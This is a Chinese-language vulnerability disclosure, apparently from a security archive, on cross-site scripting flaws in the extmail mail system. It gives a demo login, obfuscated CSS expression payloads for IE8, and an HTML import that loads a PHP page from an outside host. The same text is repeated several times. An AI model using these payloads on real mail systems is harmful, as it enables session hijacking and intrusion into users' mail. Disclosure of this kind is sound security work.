### 简要描述: extmail邮件系统是一款国内开发的开源的邮件系统,主要应用于企业、学校、政府等方面,在国内拥有较大的客户群体,该邮件系统存在xss漏洞 ### 详细说明: extmail邮件系统是一款国内开发的开源的邮件系统,主要应用于企业、学校、政府等方面,在国内拥有较大的客户群体,该邮件系统存在xss漏洞 测试官方登录地址:http://**.**.**.**/extmail/cgi/index.cgi 测试帐号:demo 密码:demo 漏洞一: 测试代码如下:<div style=xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29></div> 反斜杠是单的哦 测试环境:win7+ie8 效果图 [<img src="https://images.seebug.org/upload/201506/16135539e27cfaa8ee1a04760711afee2e8a15b7.png" alt="ie11111QQ图片20150616135426.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/16135539e27cfaa8ee1a04760711afee2e8a15b7.png) 漏洞二: 测试代码如下:<img style=xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29></div> 测试环境:win7+ie8 效果图 [<img src="https://images.seebug.org/upload/201506/16140009e526152390ce687a0badc88462bb09d4.png" alt="ie22222QQ图片20150616135612.png" width="600"...
### 简要描述: extmail邮件系统是一款国内开发的开源的邮件系统,主要应用于企业、学校、政府等方面,在国内拥有较大的客户群体,该邮件系统存在xss漏洞 ### 详细说明: extmail邮件系统是一款国内开发的开源的邮件系统,主要应用于企业、学校、政府等方面,在国内拥有较大的客户群体,该邮件系统存在xss漏洞 测试官方登录地址:http://**.**.**.**/extmail/cgi/index.cgi 测试帐号:demo 密码:demo 漏洞一: 测试代码如下:<div style=xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29></div> 反斜杠是单的哦 测试环境:win7+ie8 效果图 [<img src="https://images.seebug.org/upload/201506/16135539e27cfaa8ee1a04760711afee2e8a15b7.png" alt="ie11111QQ图片20150616135426.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/16135539e27cfaa8ee1a04760711afee2e8a15b7.png) 漏洞二: 测试代码如下:<img style=xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29></div> 测试环境:win7+ie8 效果图 [<img src="https://images.seebug.org/upload/201506/16140009e526152390ce687a0badc88462bb09d4.png" alt="ie22222QQ图片20150616135612.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/16140009e526152390ce687a0badc88462bb09d4.png) 漏洞三: 测试代码如下:<link rel=import href=http://mhz.pw/game/SOP/01.php> 测试环境:各版本Google浏览器。 效果图 [<img src="https://images.seebug.org/upload/201506/161402127dd75a2ebdefd4aca7867fe1444ab456.png" alt="ie33333QQ图片20150616140101.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/161402127dd75a2ebdefd4aca7867fe1444ab456.png) ### 漏洞证明: extmail邮件系统是一款国内开发的开源的邮件系统,主要应用于企业、学校、政府等方面,在国内拥有较大的客户群体,该邮件系统存在xss漏洞 测试官方登录地址:http://**.**.**.**/extmail/cgi/index.cgi 测试帐号:demo 密码:demo 漏洞一: 测试代码如下:<div style=xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29></div> 测试环境:win7+ie8 效果图 [<img src="https://images.seebug.org/upload/201506/16135539e27cfaa8ee1a04760711afee2e8a15b7.png" alt="ie11111QQ图片20150616135426.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/16135539e27cfaa8ee1a04760711afee2e8a15b7.png) 漏洞二: 测试代码如下:<img style=xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29></div> 测试环境:win7+ie8 效果图 [<img src="https://images.seebug.org/upload/201506/16140009e526152390ce687a0badc88462bb09d4.png" alt="ie22222QQ图片20150616135612.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/16140009e526152390ce687a0badc88462bb09d4.png) 漏洞三: 测试代码如下:<link rel=import href=http://mhz.pw/game/SOP/01.php> 测试环境:各版本Google浏览器。 效果图 [<img src="https://images.seebug.org/upload/201506/161402127dd75a2ebdefd4aca7867fe1444ab456.png" alt="ie33333QQ图片20150616140101.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/161402127dd75a2ebdefd4aca7867fe1444ab456.png)
